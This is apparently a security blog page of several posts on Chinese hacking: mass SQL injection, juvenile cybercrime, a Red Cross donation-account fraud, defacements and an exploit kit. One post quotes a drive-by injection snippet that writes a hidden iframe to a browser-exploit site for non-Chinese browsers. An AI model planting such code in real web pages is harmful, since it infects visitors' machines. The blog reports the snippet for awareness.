The Dark Visitor

From Computer World:

Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan.

First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP addresses, said Wayne Huang, CEO of Armorize Technologies Inc. in Taipei.

“The attack is ongoing,” Huang said. “Even if they can’t successfully insert malware, they’re killing lots of Web sites right now, because they’re just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim Web sites.”

Read more…here

“Electronic Heroin” an analysis of Chinese juvenile cybercrime (Part I)

Second, analysis on the causes of juvenile cybercrime

What are the reasons for juvenile cybercrime?  Adolescents resides in puberty, where large changes take place in both physiology and psychology.  Individual youth are led down the wrong road and step onto the path of criminality due to individual physiology, psychology and different types of conflicts and contradictions  Additionally, in real life there are unhealthy influences and during the socialization process, deviations and distortions easily occur in individual youth.

1. As young people mature, there is a conflict between a sense of isolation and an intense feeling of needing to belong.  On the internet, they find this compensation in the openness, equality and freedom that make a perfect match for their needs.  This makes juveniles the main crowd on the internet.  The virtual nature, openness and freedom of the internet permits unrestricted conversations that cause youth to disseminate obscene materials; their morales and sense of responsibility decay; and their awareness of legality is diluted to the point they don’t feel it is a crime.  It becomes so serious that they will even break the law.
2. The current internet legal system is not robust, allowing cybercriminals to act without legal restrictions.  Although the country has laid out a series of laws and regulations regarding internet security and punishments for computer crimes, such as the “People’s Republic of China Computer Information Systems Security and Safeguards Regulation,” the current laws are unable to adapt to the current situation of  computer development.  This is especially true for new internet problems that arise that the law is unable to restrict.  This brings about a legal gap.
3. The unhealthy content on the internet has caused juvenile criminals to bury (hide) hidden dangers.  The internet is full of pornography, reactionary (material) and violent information; as well as traps.  Understaffed chatroom supervision allows juvenile cybercriminals to bury (hide) inducements.  Some managers of underground internet cafes are the ringleaders who entice youth into criminal activity.  Some internet cafe managers are only concerned with profit, regardless of the harm the unhealthy information does to the youth, or the youth browsing all manner of pornography, reactionary (material), or violent websites.  Some go far as to supply them with these materials.  At the same time, bloody and violent internet games are the hotbed for juvenile cybercrime.  Research indicated that long-term playing of bloody and violent online games which can cause the user to develop an aggressive personality that leads to criminal activity.
4. Factors in society, school and the family are also causes of juvenile cybercrime.  Some morally corrupt individuals online recklessly spread pornographic and violent images, as well as popular online games that cause segments of the youth to become infatuated with them.  They are unable to pay the  online game fees so they take risks.  The school’s education on ethics and online morality is insufficient.  The negative evaluation of weak students, the dislike and discrimination against students with bad behavior causes some students to give up on themselves.  They become infatuated with the internet and look there to find self confidence and happiness.  Furthermore, the education at home is inappropriate, with parents not strictly supervising there children online.  Some parent’s unhealthy personal habits also influence their children.

Hacker illegally invades section of the official Red Cross website and tampers with solicited donation accounts

Verified by the Ministry of Public Security, a section of the official Red Cross website has been illegally hacked. According to the report, criminal elements gained access to the section of the website that held the special accounts for earthquake disaster relief donations.

An individual named Li Bujiu, had opened four fraudulent bank accounts to steal the funding.

The Ningbo Bank released a statement warning all citizens to be verify account numbers when making donations. The bank suggested using CCTV, TV, and newspapers as references to verify the accounts.

The falsified accounts were listed as follows:

Opened by Li Yaqiong at the Henan, bank: Agriculture Bank of China, ACCT #: 6228482080560018616;

Opened by Li Bujiu at the Commerce bank, ACCT #: 6222002201101753792;

Opened by Li Bujiu at the Agricultural bank, ACCT #: 6228480150082864813;

Opened by Li Bujiu at the Construction bank, ACCT #: 6227003526450024660;

Opened by Li Bujiu at the Postal Savings Bank, ACCT #: 6221886400011381263;

Opened by Lin Yumin at the Agricultural bank, ACCT#: 9559980150169780312

I think it was Eddie Murphy who once said, “The only reason you would want to do something like this is if you wanted to go to straight to hell and not wait in line!”

This is a long article and will need to be done in at least two parts (three?), along with a lot of gisting. It came out yesterday on Chinacourt.org and provides an in-depth look at the drivers pushing juvenile cybercrime in China:

Analysis: Juvenile Cybercrime Causes and Prevention

In the past few years, following the rapid expansion of the internet in our country (China), the internet has become a daily part of many people’s lives and an intrical component. According to statistics, in 2007, the number of online users in our country (China) reached 162 million people with juvenile users accounting for 85.8% of that figure. Furthermore, among the country’s juvenile users, 13.2% have become addicts and another 13% manifest internet addiction tendencies. The highest proportion of internet addiction occurs in 17.1% of juvenile users from the ages of 13 to 17. While the internet has the prospect of bringing happiness and creating large amounts of wealth, it also introduces enticements and sin. According to statistical data, 90% of juveniles go online to play games, while the rest use it to chat or browse unhealthy websites. Browsing unhealthy websites and playing online games is either the direct or indirect cause of juvenile crime. This article, will analyze the manifestation of juvenile cybercrime, exploring all of the causes that entice it, in order to have a beneficial discussion on countermeasures to prevent juvenile cybercrime. First, the manifestation and characteristics of juvenile cybercrime: Following the application and development of computer network technology, the youth have clearly become the majority of internet users and cybercrime has become a new phenomenon of juvenile criminals. Due to the psychological immaturity of youth, they unhesitatingly throw themselves into the internet, becoming excessively dependent and turn into “electronic heroin junkies.” Not only has the internet taken away their thirst for knowledge and kindheartedness, it has also robbed them of their precious youth. From investigations into cybercriime cases over the last couple of years, Chinese juvenile cybercrime manifests itself in these forms:

1. The internet is used to carry out traditional types of crime such as theft, ransom, injury, fraud, robbery…etc. The virtual nature of the internet provides an artificial space and convenient channel for juvenile to carry out crimes. They can very easily hide their true identity, address…etc, to carry out criminal activity.

Continue Reading »

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese – zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(“<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!

This gives me an opportunity to point out that this is not, and never will be, an anti-China blog. Our hearts and prayers go out to the country and families of all those affected by the recent earthquake that occurred in Sichuan.

Also in the interest of fairness, since I am quick to point out every nefarious acts they commit, Chinese hackers do love their country and care about their fellow citizens. At times, we must remember that a majority of the members in these organizations are young men and women in their early 20s who lead with their hearts. In that spirit, members of Hackbase.com have raised 5,000 YUAN and are donating it to the victims of the earthquake. Good for them.

For some this may be a familiar face, for the rest, let me introduce Sunwear. We met Mr. Sunwear back in November, when he was doing bad things to Japanese websites and leaving some rather crude defacements. Sunwear and a friend of his named Kitty became so upset at the attention he was receiving on the blog that they left comments imploring us to remove the article. No such luck for him.

So, did Sunwear swear off his life of crime, turn over a new leaf and devote his life to charity? No such luck for me:

Just for fun…

Just for fun? Words alone cannot express how disappointed I am…

Sign above the internet cafe reads “Hacker Tribe.”

No, this is not my new shtick. You will not be burdened with a building a day that has the Chinese characters for  hacker attached to it…unless, it becomes a really popular feature on the blog. OK, so it won’t.

Two things to point out here, one the ad for the internet cafe and the other a comment on the place:

1. The internet cafe does not have a website…repeat, the INTERNET cafe does not have a website
2. Commenter: Who knows Hacker Tribe’s IP address?  Who chose this name? Aren’t they worried about getting attacked?

Dancho Danchev has a really good analysis of the FirePack Exploitation kit localized to Chinese. Furthermore, he has some excellent thoughts on why they have chosen to localize these kits into their native language.

What is prompting Chinese users to translate these kits to their native language anyway? Is it the kit’s popularity, success rates, lack of alternatives…

Continue reading the whole article…here.

This board post from cnhacker.com popped up in my google alerts the other day and I thought it was worth sharing.  It is a list that the poster believes covers the top Chinese veteran hackers.  Follow the link to the full article

Continue Reading »